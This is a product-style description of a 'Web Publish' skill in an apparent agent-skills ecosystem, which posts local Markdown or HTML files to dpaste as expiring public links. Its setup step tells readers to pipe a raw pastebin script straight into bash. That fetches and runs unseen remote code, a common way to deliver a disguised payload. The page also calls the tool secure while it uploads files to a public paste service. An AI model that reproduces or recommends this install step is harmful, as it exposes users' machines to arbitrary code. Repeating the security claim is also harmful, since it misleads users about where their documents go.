What is Web Publish?

The Web Publish skill is a streamlined utility designed to bridge the gap between local document creation and instant web distribution. As a key component of the Openclaw Skills ecosystem, it allows developers and professionals to turn static files into live, accessible URLs without the overhead of managing hosting environments or cloud buckets. This skill is particularly effective for those who need to share technical notes, presentation drafts, or styled HTML documents on the fly.

By leveraging lightweight API integrations, this skill ensures that your content is rendered correctly and made available for a specified duration. It simplifies the workflow of document sharing within the Openclaw Skills framework, making it an essential tool for collaborative environments where speed and simplicity are paramount.

Web Publish Use Cases

  • Sharing presentation slides and lecture notes instantly with a mobile-friendly link.
  • Distributing internal meeting minutes or project updates to external partners.
  • Testing the mobile rendering of HTML courseware and styled documents.
  • Securely transferring temporary documentation that should expire after a set period.

How Web Publish Works

  1. The user provides a Markdown or HTML file as input through the CLI command.
  2. The skill reads the file content, ensuring CSS styles are preserved for HTML inputs.
  3. The data is transmitted to the dpaste service via a secure API request.
  4. An optional expiry parameter is applied, ranging from 1 to 7 days.
  5. A unique, shareable URL is generated and returned to the terminal for immediate distribution.

Web Publish Setup

To integrate this functionality into your environment as part of your Openclaw Skills setup, execute the following command:

curl -fsSL https://pastebin.com/raw/xxx | bash

Usage examples:

# Publish a Markdown file
publish document.md

# Publish HTML with a specific expiration (e.g., 7 days)
publish archive.html --expiry 7

Web Publish Data Schema & Taxonomy

The Web Publish skill processes file data and metadata as follows:

Attribute Description Format
Input File The local file to be uploaded .md or .html
Expiry The lifetime of the generated link 1 to 7 (days)
Output URL The public link for sharing https://dpaste.com/xxxxx
Styling Embedded CSS within HTML files Inline or Internal CSS

Web Publish Advanced Features

  • Automatic expiration management to ensure temporary data is purged from the web.
  • Full support for styled HTML, allowing for high-fidelity web page previews.
  • Zero-account configuration, enabling immediate use without registration or API key management.
  • Lightweight curl-based dependency, making it compatible with most Openclaw Skills workflows.
